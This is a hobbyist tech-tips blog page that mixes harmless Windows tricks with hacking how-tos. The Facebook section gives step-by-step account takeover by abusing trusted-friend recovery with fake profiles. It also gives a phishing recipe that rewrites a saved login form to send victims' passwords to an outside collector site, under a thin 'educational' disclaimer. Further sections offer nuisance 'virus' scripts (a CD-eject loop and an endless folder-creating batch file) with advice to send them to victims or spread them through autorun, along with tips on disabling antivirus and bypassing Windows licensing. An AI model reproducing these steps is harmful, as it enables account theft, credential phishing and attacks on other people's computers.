Facebook Hack      Windows Password Hacking      Speed Up Your PC      Best Ways to Hide Data      Stenography(Hide data behind Images)
Access Blocked websites      Download Torrent in College





Nothing feels good when we can't work properly on our pc because it is invaded by thousands of viruses, worse happens when our cpu shows no sign of even starting up….Daily routine problems ranging from computers to mobiles make our lives motionless in a second… We then regret our lack of knowledge about these subjects….
We are here to help you at this point, we are trying to provide that every little and interesting info about these important things which will prepare you for the upcoming problems in these Fields.. Hope you will enjoy having this piece of knowledge….

PUT UR PROBLEMS ON THE "Problems solved" PAGE ND GET EASY SOLUTIONS..

Google Sms

Subscribe to our Google Sms Channel , to get notifications about new posts and get regular tips and tricks on your mobile .
Just send
ON Loopholes to 9870807070 or click here
and Get regular updates on your Facebook , just like the Facebook page Click Here

Change any folder's background in Windows XP


Most of you must have thought about it many a times.. Changing any folder’s background apart from changing that old desktop background(wallpaper) daily..
The idea sounds good- You are able to change any folder’s background to any image which you like..

I will teach you a simple method to do this without using any software( as softwares, according to hackers are “bad shortcuts for those who are too lazy to do something interesting” J). You can also experiment around and change other things related to folders..

The Desktop.ini  file

1-So whatever we are going to do here is related to this hidden and system file named desktop.ini which when opened is a text file and you can easily edit it.
For this your first task is to enable hidden files and system files by going to Tools>Folder options>View>select "Show hidden files and folders" and untick "Hide protected operating system files"

2-Each folder in windows xp will not contain this file by default. If you want to customize suppose, your folder named “Songs”, you have to go to its properties>customize tab>and do some customization and then apply it. As soon as you do some customization you would see the desktop.ini file inside your folder “songs”. So now this is the customization file for you folder “songs”. Open it.
By default it will contain this text-

[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=4

I will specify what all these mean after completing our main task.

3-So now all you want to do for changing your songs folder background to a new image named suppose “songback” is this-
Copy paste this code before [.ShellClassInfo] in the file

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=D: \songback.bmp

Here the highlighted address of songback should be changed to the address of your background file.
Now save the file and refresh..

You are done.. You will see the new image as your background in that folder..

Simple and interesting!!

Note- The background image should be a .bmp or .jpg.  .jpeg will not work.

Here i have shown the snapshot of how my folder will look after making the changes-



So now we come to what other things you can do in this file-
You can add these entries and values to change certain things related to your folders.. Like you can-
1-Change the icon of you folder to any icon image
2-Show tips related to your folder when cursor is moved onto it.
3-Change the color of text of all icons inside that folder.

Example-
[.ShellClassInfo]
ConfirmFileOp=0
IconFile=Folder.ico
IconArea_Text=0x00000000 
InfoTip=Some sensible information.
 
  
ConfirmFileOp- Set this entry to 0 to avoid the warning "You Are Deleting a System Folder" when you try
 to delete or move the folder.

IconFile- Set this entry to the name of any icon you want for your folder icon(with extension .ico or .bmp(not preferred))

IconArea_Text- Set this value to  0x0 for black, 0x000000FF for red, 0x00FF0000 for blue,
0x0000FF00 for green AND 0xFFFFFF for white. This will change the icon text colors inside your folder.
 
 InfoTip- Set this entry to any information which you want to display when you move your cursor 
over this folder.
 
 
One more thing that i have discovered is that by this method you can't change the 
background image which you see when you open any drive. It is for folders only.
For changing the background of drives do the following.
 
1-Make a new text file inside that drive and copy the following in it-
 
[.shellclassinfo]
iconfile=%systemroot%system32shell32.dll
iconindex=127
confirmfileop=0
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=E:\abc.jpg
iconarea_text=0xFFFFFF
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%folder.bmp
You need to change the text highlighted in pink to the address of your background image.

2-Now save this file as desktop.ini.And its done.
Refresh and you will see the new image as your background. 
Here i have changed the background of my C: drive.


 
 Never stop experimenting!! Be Smart Gadgeteers!! 
 
Happy Computing!! :-) :-)
 
 


















Downloading Blocked Files or Torrents in Colleges / Offices etc .




1.To download blocked files

Go to these websites and enter the link of the file and it will download it with some other extension , you need to rename its to original extension.
( Know how to access blocked sites )

http://txtor.dwerg.net/
http://www.underget.com/

 


In box enter the url of the file .... and rename it with some other extension and download .



2. To Download Torrents....


Using  www.torrific.com (That  worked for me ) and click on sign up on top-right .


Now copy the url of the torrent by right clicking on download torrent and copy link location...
it would be like   "name of torrent".TPB.torrent


Paste that in the box and click on get, torrific will tell you if it is already available or in how much time you can get a direct download link...
Torrific downloads the file on its server and you download it from torrific .









Another website is http://instant-torrents.com/ about which i can't say much .










Accessing Blocked Websites in College / Offices etc


1. Using Proxy Websites
     
Well you can use any of proxy website to access the blocked sites ... the one which is like the most it

www.heavymouse.com

in the box enter the address of blocked site and bingooo.........




2. Using Proxy Software

The software which always worked for me and i like the most is Ultrasurf ...

Just download it , unzip and run but  disable your antivirus first...
Now,

1. Connect to internet , after that ...

if you use proxy settings then go to options
enter manual proxy and enter the proxy which you use to browse the internet .
Then wait until it successfully connect to sever .







2 . Either you need proxy or not
   Do this...
   After that in your Internet option > LAN settings > set this proxy address and port ...

   127.0.0.1 and port 9666

If you use Firefox the go to options , network > settings , manual proxy and enter the proxy told above and tick use this proxy for all.


3. Now browse the internet you will be able to access the blocked sites ....


Download Ultrasurf...



Another Method is By Using Hotspot Shield ... Visit Here..............

Club Icons of same type in Taskbar

You can club icons of same type in the taskbar ... like all internet browsers together and like all office applications together , multimedia together etc ....


Get Bins From Here....


Install and it will tell you how to do this.....




Create your own text to speech converter

Make your computer speak whatever you type.  It’s pretty cool. Just run this script and make it read any funny sentence.Copy the code given below in notepad and save it as anyname.vbs. Make sure that you save it as .vbs file.
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
After making a vbs file just double click on that file and type anything you want in the textbox.


Source : Google Search .

The 10 Coolest Windows Shortcuts You Never Knew About

Keyboard shortcuts are the essence of PC productivity. While newbs slowly mouse around their screens in search of buttons to click, seasoned tech vets hammer through a day’s work with ease thanks to a wealth of arcane hotkey combos that knock out useful tasks in seconds. Of course, every PC user knows a few handy shortcuts, and hardened system tweakers like yourself have forgotten more hotkeys than most users will ever learn. But here are 10 cool combos that even you might not know.
1. Windows Logo + L
logo plus l
Walking away from the screen for a while? Keep prying eyes out of your stuff with this quick shortcut that locks the PC instantly.
2. Shift + Delete
shift delete
The lazy way to delete stuff in Windows is to drag it to the Recycle Bin. An even lazier way is to highlight the file and press Delete. And if you’re ultra-lazy (and smarter than the average user), you can bypass the Recycle Bin entirely by pressing Shift + Delete. The downside is that you won’t get the opportunity to easily restore the file from the Recycle Bin if you later decide you want it back, but you also won’t have to bother emptying the Recycle Bin if you use this method to ditch unwanted files.
3. Windows + Tab
windows open
If you’ve got multiple windows open within a given app, this handy shortcut will let you quickly switch between them, so you don’t have to waste time clicking around in search of the right window.
4. Shift + CTRL + N
Windows 7 made it a little easier to create new folders in Windows Explorer. Now you can just hit Shift + Ctrl + N in any folder to create a new untitled folder right where you are. The new folder will appear with the name ‘New folder’ already highlighted so you can type in your own name for it and hit Enter to move on to the next task.
5. Windows + M
Got a bazillion windows cluttering your screen? Press Windows + M to instantly minimize all current windows to the Taskbar. It’s a great way to restore your sanity, and an even better way to hide what you’re working on from unexpected interlopers. When you want all the windows back again, press Windows + Shift + M and every currently running window will pop open again.
6. Windows + Spacebar
If you just want to take a quick peek at your desktop (for instance, to locate a file you’ve dropped there), there’s no need to completely minimize all your windows with the Windows + M shortcut. Instead, press Windows + Spacebar, and all of your open windows will turn transparent so you can see right through them. This even works with maximized windows and full-screen views. To return your view to normal, simply let go of the keys.
7. Windows + Shift + Left or Right Arrow
dual monitor
If you use a dual-monitor setup to maximize your screen real estate, you might like to use one monitor as your primary working screen and the other as a holding pen for active windows. Or maybe you just need to move a window from one side to the other for some reason. In either case, hitting Windows + Shift + Left Arrow will move a current window to from the right display to the left, and using Right Arrow will move it from the left display to the right. If you only have one monitor, these commands will dock your window to the designated side of the screen.
8. Windows + 1, 2, 3, etc.
taskabr
Windows 7 introduced a new feature that lets you pin apps to your Taskbar for quick access. An even quicker way to access those apps is with this slick keyboard shortcut. Press Windows + 1 to launch the first pinned app in your Taskbar (from left to right). Windows + 2 launches the second one, Windows + 3 launches the third one, and so on.
9. Windows + T
Windows + number launches pinned apps in your Taskbar, but if your apps are already open, there’s a quick way to scroll through them. Press Windows + T and you’ll highlight the first open app in your Taskbar. Press it again and you’ll move to the second open app. As you scroll through them, you’ll get a preview box just as you would if you were hovering over the icon with your mouse. When you get to the app you want, hit Enter to bring it to the foreground. This shortcut only works with open apps, and ignores unopened apps that you’ve pinned to your Taskbar.
10. Windows + (+/-)
Want a closer look at whatever’s on your screen? Hit Windows and + to zoom in for a magnified view. While you’re magnified, moving the mouse around the screen will move you to the far corners and bring them into view. Windows and - zooms you back out again.

Facebook Hacking

Note : Only For Educational Purpose , So that you can protect yourself , if someone is hacking your account using this tricks....

Many people keep on searching , how to hack facebook and all ...

Actually we can't hack facebook but we can hack any person's account on facebook , by using some loopholes or creating some .

I am gonna tell you two ways to Hack an Account on Facebook ...


1.Using Facebook Friends Verification Trick....

Step 1 : First of all create 3 email accounts & sign up on facebook using those fake accounts. You must have 3 accounts on facebook and don't forget to confirm them .

Step 2 : Next send a friend request from all the 3 accounts to the victim and you should be clever enough that your requst must be accepted.

Step 3 : You can create an account with a victim friend name and can say its a new account or if he has interest in music /dance anything , you can create an account like music lover  etc , and you can create an account with a girl name with an attractive display pic , so any boy will accept :P .

Step 4 : Now go to www.facebook.com and click on “Forgot your password”.
You will need to identify the victim's account by using his Facebook name or Facebook name + Facebook friend's name , Facebook E-mail. When you got the right account , click on  "This Is My account".

Step 5 : After that  Facebook will suggest to recover password by existing email address. You need to  bypass that by clicking on "No longer have access to these"?

Step 6 : Next Facebook will ask a secret question (If the victim has one), you also need to bypass that, by entering the  wrong answers three times. After that Facebook will try to help you recover the password by the help of 3 friends and here comes the loophole.

Step 7: Now one by one select the three fake profiles that your victim added to his/her friends.(Fake id must be atleast three weeks old ).

Step 8: After doing this you will get the verification code on your fake profiles, with those 3 codes you can easily change the password.

Note : The fake account must be friend with that person with atleast 3 weeks.& all  3 accounts must not be mutually friends.

For eg:- If you want to hack "A" with your "B" , "C" & "D" accounts then "A" should be friend with "B" , "C" & "D" all and atleast from last 3 weeks and also be careful that "B" , "C" & "D" should not be friends with each other.



2.Using Phishing....

Step 1: Go to www.facebook.com

Step 2: Save the login page of facebook (shortcut:press ctrl+S)

Step 3: Now 2 things would have been saved in your computer with the name "Welcome to Facebook - Log In, Sign Up or Learn More"

Step 4: Right click on the saved file with name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" and open it with notepad

Step 5: Now search where the word action is written in it for the first time (shortcut:press ctrl+F then type action in it and then press enter).

Step 6: Now after action you will see action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

Step 7: Now replace that line with action="http://hackfact.com/fb.php?id=your-email-id-here@gmail.com&link=www.facebook.com/login.php?login_attempt=1"

Step 8: Now replace the line your-email-id-here@gmail.com with your email-id where you want to receive the password.

Step 9: Save the notepad(shortcut: ctrl+s).

Step 10: Now just put this page on your Desktop who so ever will login from this will be hacked. You will be having his/her password in your email-id or the other option you have is that upload this page on a free web hosting site where you can upload both these pages and if you have your own website you can upload this on that and send the link to others.    bingoooooooo..:).

Note: Remember both the files will be moved together which you saved with the name "Welcome to Facebook - Log In, Sign Up or Learn More" and you can rename the file with the name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" but not that folder.

This trick was for educational purpose only and the preventive measure is that always see the URL of the site(Complete URL if site has url www.facebook.com.hackfact.com then also its fake not genuine.).

and third method is Using Key-loggers but it will work only if you are able to install that keylogger on the victim pc , which is not possible in most of cases .

Source : www.hackfact.com , give it a visit also... many more tricks by my  friend ....

Specify Permissions of a Data/Folder/Drive for a particular user in Windows 7


For eg.

Denying access of opening  D: drive to Guest account .

1. Right click the folder / drive whose permissions you wanna edit .

2. Now go to properties and click on security tab .

3. Click on edit and then click on ADD .

4. Type guest(or for whichever username you want to change ) and click check names .

It will show Pc name / Username . Click Ok .






5. Now select that username and below it will be Perrmissions for guest .

6. You can select permissions what you want .

7. Like for denying complete access , Tick on Full control > Deny box and apply .

8. Now login in guest you will find D:\ inaccessible .
  That means you can configure any permissions of any folder or drive for anyusers in similar way .

You can deny it to yourself also to protect data from viewing by others and then again allow by clicking full control > allow box and apply & you can access it again .





Note : it wont affect any data .

Folder options via Registry Editing



1 . Press Win+ R key and type regedit & hit enter , it will open registry editor.

Super Hidden Dword in registry

Now go to  HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Explorer>Advanced

2 . On right you will see a Registry DWORD named ShowSuperHidden , Double click on it and make the value 1 instead of 0.
Dword Edit

3 .Now restart you computer....


Similarly you can edit all other folder and explorer options by using this......

Change The Default Location For Installing Apps


 As the size of hard drives increase, more people are using partitions to separate and store groups of files.

XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.

Go to :-

-         Start > Run
-         Type <regedit>.Press Enter.




- Go to this directory…
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion




-         Look for the value named ProgramFilesDir. ,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.
       

And its done!!!

Make PDF Files Speak 2 You

An Interesting Trick in the Adobe Reader. This trick works in Adobe Reader 7.0 and above .

1. Install Adobe Reader , if you haven’t already.
2. Now go to View>Read out Loud> Activate Read Out Loud.
3. Now you are done , it will read out loud the pdf in the Default Microsoft Sam voice.

Hide your data behind an image ....( Steganography )

1. Make a folder named loopholes in c: drive .
2. Now copy an image (behind which you wanna hide the data)to this folder , say image.jpg .
3. Now copy all the data in that folder and select them and right click and select add to loopholes.rar as shown .











 4. Now go to run type cmd .Press Enter.
5. In command prompt type the following commands...

    cd c:\loopholes
    copy /b image.jpg + loopholes.rar image.jpg












6. Now its done , you will see that the size of your image has increased , you can delete the data you copied in that folder and also the loopholes.rar file .

7. Now if you wanna view the data you can open that file in Winrar and you can extract it to get the data back .





Wanna know other ways to hide data .... click here...

Create a Virus which Will Open And Close your Cdrom

Follow these steps to make this virus..

1-Open Notepad.
2-Copy the code given below into notepad and save it as "anyname.vbs" like "virus.vbs"

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If



Tada!!!!! U r done! U have created ur first virus.Send it to any1(a friend will be gooood) or attach in autorun to run automatically via pendrive.


Try it urself ....click on that virus.vbs .

????

Now if u want to disable this go to task manager (ctrl + shift + esc ) click on process tab and  then find wscript.exe and end this process .

What is Mac Address....


A MAC address, or Media Access Control address, is a address associated with a network adapter. While IP addresses are associated with software, MAC addresses are linked to the hardware of network adapters. For this reason, the MAC address is sometimes called the physical address or the hardware address. MAC addresses are expressed in hexadecimal notation in the following format: 01-23-45-67-89-AB. (:) are sometimes used instead of dashes (-).
MAC addresses are often considered permanent as they are hardware address which is assigned by manufacturer itself, but in some circumstances, they can be changed.

There are two types of MAC addresses:

1.Locally Administered Address
The LAA(Locally Administered Address) is an address that changes an adapter's MAC address. The LAA is a type of administered MAC address, and it is possible to change the LAA of a network adapter to any address of allowed length. When the LAA is set, the network adapter uses the LAA as its MAC address. Otherwise, network adapter uses the UAA(Universally Administered Address) as its MAC address. All devices on the same subnet must have different MAC addresses, however. MAC addresses are very useful in diagnosing network issues, such as duplicate IP addresses, so it is a good practice to allow devices to use their UAAs instead of assigning LAAs.
2.Universally Administered Address
The UAA(Universally Administered Address) is the most commonly used type of MAC address. This address is assigned by the manufacturer to the network adapter. The first three octets define the manufacturer, while the second three octets vary and identify the individual adapter. All network adapter manufacturers have their own code, called the Organizationally Unique Identifier (OUI). For example, in the MAC address 00-14-22-00-40-96, the first three octets 00-14-22 for Dell 00-40-96 for Cisco.
MAC addresses are useful for security purposes, as they are only rarely changed from the default. IP addresses can change dynamically, especially on networks using DHCP to assign IP addresses, so MAC addresses are often a more reliable way to identify senders and receivers of network traffic. On wireless networks, MAC address filtering is a common security measure to prevent unwanted network access.
  • how to check MAC address
        Go to run type cmd and enter " getmac "
         You will find you MAC address .....


What is IP Address........

An IP address is a fascinating product of modern computer technology designed to allow one computer (or digital device) to communicate with another via the Internet. IP addresses allow the location of literally billions of digital devices that are connected to the Internet to be pinpointed and differentiated from other devices. In the same sense that someone needs your email-id to send you a letter, a remote computer needs your IP address to communicate with your computer.

You can also say that IP-address is similar to name in humans. Humans use name to identify each other similarly in computers we have IP-address

"IP" stands for Internet Protocol, so an IP address is an Internet Protocol address. What does that mean? An Internet Protocol is a set of rules that govern Internet activity and facilitate completion of a variety of actions on the World Wide Web. Therefore an Internet Protocol address is part of the systematically laid out interconnected grid that governs online communication by identifying both initiating devices and various Internet destinations, thereby making two-way communication possible.

An IP address consists of four numbers, each of which contains one to three digits, with a single dot (.) separating each number or set of digits. Each of the four numbers can range from 0 to 255. Here's an example of what an IP address might look like: 78.125.0.209. This innocuous-looking group of four numbers is the key that empowers you and me to send and retrieve data over our Internet connections, ensuring that our messages, as well as our requests for data and the data we've requested, will reach their correct Internet destinations. Without this numeric protocol, sending and receiving data over the World Wide Web would be impossible.





Go to run and type cmd .

In cmd enter ipconfig and you will find your ip address .

Types of Hacking and Hacking as a Carrer....

Hacking is of three types:-


black hat hacking

A black hat is the villain or bad guy, especially in a western movie in which such a character would wear a blackhat in contrast to the hero's white hat.Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent.the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose.They are the ones that hack illegally the brake in to some one elsis pc and well you know the rest.The black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose.
The phrase is often used figuratively, especially in computing slang, where it refers to a computer security hacker that breaks into networks or computers, or creates computer viruses.

grey hat hacking

A grey hat, in the hacking community, refers to a skilled hacker whose activities fall somewhere between white and black hat hackers on a variety of spectrums. It may relate to whether they sometimes arguably act illegally, though in good will, or to how they disclose vulnerabilities. They usually do not hack for personal gain or have malicious intentions, but may be prepared to technically commit crimes during the course of their technological exploits in order to achieve better security.

White hat hacking

White hat(computer security), a computer hacker intending to improve security
White hat (film), a hero character. A white hat hacker are like the jedi i cyberspace they track down black hats and get rid of them. nothing a white hat does is illegal. also a White hat can be hired to test out the security and if there are any bugs they fix them or they can be hired to protect a ceratin server. so do you see black bad white good.



Hacking as a career

Individuals, government and companies are nowadays highly dependent on the Internet. However, most of them still remain unaware of the various risks of cyber crime and fraud. With a growth in computer users and networks, the scale and sophistication of cyber crimes has increased as well - hence creating a high demand for Ethical Hackers. The job of an Ethical Hacker is to get into the minds of computer criminals, think like them and come up with innovative methods to protect network , computers and data. Companies hire ethical hackers to find out any vulnerability that might exist in their network and to find out how to fix them, so that these companies can secure their valuable online data.

The demand for Cyber Security experts is booming across the world. Especially after the recent attacks, Chinese cyber attacks on different countries and bomb blasts in various parts of the world, people have woken up to realize the importance of cyber security experts. And hence choosin hacking as career has become a good option.
Ethical Hacking has already become one of the hottest career opportunities available. Nowadays, all organizations including banks, Internet companies, airlines, hotels, telecom companies, police departments, ITES companies, retail chains, government agency and other companies need Cyber Security experts to protect themselves.

The demand for cyber security experts is rising at a tremendously high rate in the world over. According to a recent NASSCOM report on IS(Information Security) Manpower Demand Estimation- "As per IDC, the worldwide demand for IS Services was approximately $8 billion in 2001, estimated was about $23.6 billion by 2006.Correspondingly, there is a growing demand for IS professionals which is expected to be very good in the years of 2012 and so on. 






What is hacking...


Hacking is the art of creative problem solving, whether that means finding an unconventional solution to a difficult problem or exploiting holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation needed to really push the envelope

Most people associate hacking with breaking the law and assume that everyone who engages in hacking activities is a criminal. Granted, there are people out there who use hacking techniques to break the law, but hacking isn't really about that. In fact, hacking is more about following the law than breaking it. The essence of hacking is finding unintended or overlooked uses for the laws and properties of a given situation and then applying them in new and inventive ways to solve a problem , whatever it may be.

Hacking tends to be a misunderstood topic, and the media likes to sensationalize, which only exacerbates this condition. Changes in terminology have been mostly ineffective-what's needed is a change in mind-set. Hackers are just people with innovative spirits and an in-depth knowledge of technology. Hackers aren't necessarily criminals, though as long as crime has the potential to pay, there will always be some criminals who are hackers. There's nothing wrong with the hacker knowledge itself, despite its potential applications.

How does one distinguish between the good hackers who bring us the wonders of technological advancement and the evil hackers who steal our credit card numbers? The term cracker was coined to distinguish evil hackers from the good ones. Journalists were told that crackers were supposed to be the bad guys, while hackers were the good guys. Hackers stayed true to the Hacker Ethic, while crackers were only interested in breaking the law and making a quick buck. Crackers were considered to be much less talented than the elite hackers, as they simply made use of hacker-written tools and scripts without understanding how they worked. Cracker was meant to be the catch-all label for anyone doing anything unscrupulous with a computer & pirating software, defacing websites, and worst of all, not understanding what they were doing. But very few people use this term today. 

Best Ways to Hide any Data without any software

1.Using Folder attributes
Copy all of your data in a folder.
Now go to cmd by typing cmd.exe in run box and use the command ...

"attrib +S +H d:/folder "









It will hide the data and make it system also .
But if other person has enabled viewing of Hidden and system files from folder options then he/she can view your folder .




To remove these attributes you can use
"attrib -S -H d:/folder"



2. You can create a folder with no name and no icon .
To do this rename a folder and press Alt+0160(fron numpad) , it will create a folder without any name .
Now go to propeties of that folder and click on Customize tab and click change icon and you will see a box full of icons slide it to right you will see few blank spaces ... select any one of them and ok and apply .








You will get a folder without any name and icon .
and you can change its attrib also as told in 1 .


3.This is the best way using Disk Management .

Go to run... type diskmgmt.msc .

First of all create a new partion by shrinking any drive (Know how to shrink and create new partion ) and now put  your data which you wanna hide into that partition.
Now in disk management right click on the partition box in which  that data  is present ,
and click on Change Drive letter or path , after that select the drive letter and click on remove and ok .
Ignore any Warning and be careful not to do this with C drive .

You will see that ,that partition has become invisible in  My computer ..








To enable it back you can go back to diskmgmt.msc and select that partion and Change Drive letter or path  and add a drive letter ... you will see a partion in my computer with that drive letter and data .


4 .Hide your data behind an image ....( Stenography )

5. Specify Permissions of a Data/Folder/Drive for a particular user in Windows 7  



...............

How to create a new folder virus

1-Open notepad
2-Copy the following code in notepad


    :loopholes
    md "New Folder"
    cd "New Folder"
    goto loopholes



4-Save it or Press Ctrl+S .
5-Give anyname with extention as  ".bat " for  eg:- virus.bat
6-Send this file to your victim and ask him to click on it ......& done ..:)

     or you give it in pendrive and attach in autorun , so it will run automatically .
       
Trick :- What we have actually done here....
md=make directory(which tells to create a folder with a name "New folder"
cd=change directory(on creation of new directory it goes into that directory)
  and goto loopholes simply makes a loop so that command will run again and again infinitely .

How to add safe mode to your boot list in Windows XP



Safe mode is required when you have to fix a problem such as virus infection or uninstalling drivers in your windows XP. generally we need to use F8 Key to get into safe mode and if not timed properly you will need to restart windows xp again. Here is a small trick which lets you add Safe mode by default into your Boot list. You will see it when you restart your windows xp machine.

 

 

Steps to Add Safe Mode in Boot list 

  • Go to control panel > System.
  • Click on Advanced Tab.
  • Then click on settings under the startup and recovery action.
  • Click on edit under system startup to indirectly edit your boot.ini file.
  • Add the following entry multi(0)disk(0)rdisk(0)partition(2)\WINDOWS=”XP – Safe Mode” /fastdetect /safeboot:minimal /sos /bootlog” without quotes .

Thats it, restart your machine and you will see another label as “XP- Safe Mode” added to the list.  This option is also used for adding any other windows installation on other partition.

Windows Registry

Microsoft Windows stores its configuration information in a database called the registry. The registry is the central storage for all computer configuration data. The Windows system configuration, the computer hardware configuration, information about installed programs, the types of documents that each program can create, and user preferences are all stored in the registry. Windows continually references this information during its operation. The registry stores the data in a structured hierarchy of keys, subkeys, and named values. Incorrectly editing the registry may severely damage your system. Microsoft recommends that you backup the registry before you edit it.
Although the registry appears to be in one file, it is actually placed on your computer in several files. Depending on your system configuration, registry files can be found in any of the following locations:
    C:\Users\User Name\ on Windows Vista, 7.
    C:\Documents and Settings\User Name\ on Windows 2000, XP.
    C:\Windows\System32\Config\ on Windows 2000, XP, Vista, 7.
    C:\Windows\ on Windows 95, 98, ME.
    C:\Windows\Profiles\ on Windows 95, 98, ME.
Registry data is usually stored in the following files, typically referred to as 'registry hives':
  • System.dat, User.dat, and Policy.pol, on Windows 95, 98 and ME.
  • Security, System.alt, Default, Sam, Software, System, Ntuser.dat, and other files, on Windows NT, 2000, XP, Vista, and 7.

How to back up Windows registry?


METHOD 1


Unfortunately, it is not possible to back up registry files under Windows NT, 2000, XP, Vista, and 7, while the operating system is running. Registry files remain fully locked all the time while Windows is running, so there is no access to those files. You can however use an integrated Windows' System Restore feature for registry backup.However its better not to use this method if u have less space in c: drive, as system restore function takes a lot of a space So disable this function and use the other method instead

 

Manual steps to back up the registry in Windows XP

  1. Click Start, click Run, type %SystemRoot%\system32\restore\rstrui.exe, and then click OK.
  2. On the Welcome to System Restore page, click Create a restore point, and then click Next .
  3. On the Create a Restore Point page, type a name for the restore point and then click Create
  4. After the restore point has been created, click Close.
Note If System Restore is turned off, you receive a message that asks whether you want to turn on System Restore now. Click Yes. Then, in the System Properties dialog box, click to clear the Turn off System Restore check box, click OK, and then repeat this step.


Manual steps to restore the registry in Windows XP

Use System Restore to undo registry changes in in Windows XP

  1. Click Start, click Run, type %SystemRoot%\System32\Restore\Rstrui.exe, and then click OK.
  2. On the Welcome to System Restore page, click Restore my computer to an earlier time (if it is not already selected), and then click Next .
  3. On the Select a Restore Point page, click the system checkpoint. In the On this list select the restore point area, click an entry that is named "Guided Help (Registry Backup)," and then click Next. If a System Restore message appears that lists configuration changes that System Restore will make, click OK.
  4. On the Confirm Restore Point Selection page, click Next. System Restore restores the previous Windows XP configuration and then restarts the computer.
  5. Log on to the computer. When the System Restore confirmation page appears, click OK..


METHOD 2


Alternatively, the registry editor (regedit.exe) allows you to export partial or complete copies of the registry, while the Windows is up, and the exported files can then be backed up with Argentum™ Backup or any other traditional file backup utility. If there is a registry problem, the exported file can be easily imported to restore all or part of the registry. And the exported file is a text file that's easily read and manipulated. You can follow these simple steps to back up the whole registry or any particular registry subkey:
  1. Click Start, and then click Run.
  2. In the Open box, type regedit, and then click OK.
  3. Locate and then click the root subkey that contains all the child subkeys and values that you want to back up.
  4. On the File menu, click Export.
  5. In the Save in box, select a location where you want to save the Registration Entries (.reg) file, type a file name in the File name box, and then click Save.
The exported registry file is about 50-100 MB in size on a typical Windows XP/Vista/7 installation. The registry exported files are text files and are usually well-compressed (by up to 75% and more). You can use Argentum™ Backup to automatically compress and save them in Zip archives. To restore registry subkeys that you exported, double-click the Registration Entries (.reg) file that you saved.
As opposed to Windows XP, Vista, and 7, registry backup is very easy when running Windows 95, 98, and ME, and it can be fully automatic. You can back up registry files either manually, by hand, or fully automatically, with the help of Argentum™ Backup . It will find the correct locations and back up all of your registry data automatically, quickly and safely.




Download argentum backup 1.2 MB




  



Upgrading Your Windows Home,Professional to Ultimate in 2 minutes

If windows 7 is installed in your computer and it is Some Basic edition like Home , Professional
You can upgrade it to windows 7 ultimate in 2 minutes , without installing or losing any data .

1. Go to Properties on My Computer .
2. Here at the top you will see Windows Edition and below that there will be "Get New features with another version of windows" option .
3.Click on Upgrade , it will ask for a key , so Enter the key given below
4. Now click on next, it will restart your computer & will upgrade your windows to Windows 7 Ultimate .

Installing any Windows 7 Edition from any edition DVD/iso


1. Let us suppose, you have home premium dvd and you wanna install ultimate version .
2. Create the iso file of the dvd . ( Know How ??)
3. Now open that iso and you will find a "sources" folder in it .
4. In the sources folder there will be a file named "ei.cfg" .
5. Delete that file from the iso .
6. Now burn that iso on a dvd or on a pendrive ( how to use pendrive to install windows )
7. Boot the dvd and during installation it will ask which version to install like home premium , professional , ultimate .

How to create iso from Dvd

1. Download Magic Iso from here and install it .
2. Now insert your dvd.
3. Right click on your DvD you will see a magic iso option , drag cursor on it .
4. Now click make image  file from G:/  ( here G is your dvd drive name )


















5. You will see a box like this .

 




6. Now select iso in the output format and in the output box select the path where you wanna save the iso
7. Click ok , it will create the iso file .
8. You can also edit an iso using the Magic iso , open the iso file with Magic iso and edit .

What do you mean by Booting / Booting Process / How a Pc Starts or Operating System loads

Start your computer and a message comes up: "Insert bootable media," which means that your computer, whatever system is running, has failed to boot normally. If you want to use your os, you had better do something  and find out the reason. There are a few reasons why this has happened, but don't worry. Think calmly, follow these steps and you can get to the root cause fast.


  1. Why This Message Shows

    • The message means that, after the computer POST (power on system test), the computer cannot find an operating system. Finding an operating system will depend on which operating system is installed. If it is a Windows XP system it is looking for NTDETECT.COM, BOOT.INI and an assortment of files that determine what happens when Windows boots. If it is a LINUX system, it will be looking for a bootloader like LILO (Linux Loader) or GRUB (Grand Unified Bootloader), which passes control to the LINUX kernel. Then the system starts up with the user's choice of startup programs that form the desktop applications. This process is the same for both Linux and Windows.
      The term "boot" comes from the idea of "pulling the bootstraps on" the system---in computer parlance, a way of describing the system startup. This terminology stuck after first being coined by computer engineers during the beginning days of computer systems.

    What the Boot Process Involves

    • After the POST, the system searches for a boot device; commonly, a bootable partition on a hard disk, a CD-ROM or floppy disk, in that order nearly every time. It can also be a network device or a USB or flash memory card. Many of Cisco's internet
